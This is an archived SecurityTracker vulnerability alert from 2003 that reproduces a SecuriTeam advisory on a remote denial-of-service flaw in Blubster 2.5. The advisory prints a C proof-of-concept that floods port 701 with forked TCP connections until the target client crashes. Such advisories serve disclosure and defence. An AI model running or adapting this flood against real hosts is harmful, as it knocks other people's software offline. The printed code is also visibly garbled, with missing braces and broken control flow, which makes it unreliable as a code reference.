Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Blubster File Sharing Software Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1007561
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 25 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 2.5
|
Description: A vulnerability was reported in the Blubster file sharing system in the voice chat feature. A remote user can cause the application to crash.
SecuriTeam reported that a remote user send a flood of connections to port 701 on the target system to cause the target application
to crash. The system will not log the attack, according to the report.
A demonstration exploit is provided in the Source Message.
Luca
Ercoli is credited with reporting the flaw.
|
Impact: A remote user can cause the application to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.blubster.com/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: SecuriTeam <support@securiteam.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 24 Aug 2003 16:44:39 +0200
From: SecuriTeam <support@securiteam.com>
Subject: [NT] Remote DoS in Blubster
|
The following security advisory is sent to the securiteam mailing list, and can be found at the Secur iTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Remote DoS in Blubster
------------------------------------------------------------------------
SUMMARY
<http://www.blubster.com/> Blubster is "a file-sharing network that uses
a peer-to-peer network similar to Gnutella, with a new private protocol
that works without a central server". A remotely exploitable denial of
service attack can be used against the product.
DETAILS
Vulnerable systems:
* Blubster version 2.5
While application is running, port 701 listens for incoming "voice chat
session". By flooding this port, a remote attacker can cause the
application to crash. This attack will go un-logged.
Exploit:
/******************************************************************
* Blubster client v2.5 Remote Denial of Service *
* Proof of Concept by Luca Ercoli luca.ercoli[at]inwind.it *
******************************************************************/
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
int ck,port=701,sd,cx=0,contatore=0,prec;
struct sockaddr_in blubster_client;
void ending(char *client){
int i;
blubster_client.sin_family = AF_INET;
blubster_client.sin_port = htons((u_short)port);
blubster_client.sin_addr.s_addr = (long)inet_addr(client);
for(i = 0; i < 100; i++){
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &blubster_client,
sizeof(blubster_client));
if(ck != 0) {
prec = 0;
if (prec == 0) contatore++;
if (prec == 1) contatore = 0;
if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
if(ck == 0) prec = 1;
close(sd);
void kill_blubster(char *stringa){
short i;
blubster_client.sin_family = AF_INET;
blubster_client.sin_port = htons((u_short)port);
blubster_client.sin_addr.s_addr = (long)inet_addr(stringa);
for(i = 0; i < 50; i++){
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &blubster_client,
sizeof(blubster_client));
if(ck != 0) exit(0);
close(sd);
int main(int argc, char **argv)
short i;
prec = 0;
if(argc < 2)
{
printf("\nUsage: %s <client-ip>\n", argv[0]);
exit(0);
}
prec=0;
printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");
for (i=0; i<12; i++) if(!fork()) kill_blubster(argv[1]);
printf ("+ Ending...\n");
ending(argv[1]);
ADDITIONAL INFORMATION
The information has been provided by <mailto:luca.ercoli@inwind.it> Luca
Ercoli.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu riteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co m
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con sequential, loss of business
profits or special damages.
|
|
Go to the Top of This SecurityTracker Archive Page
|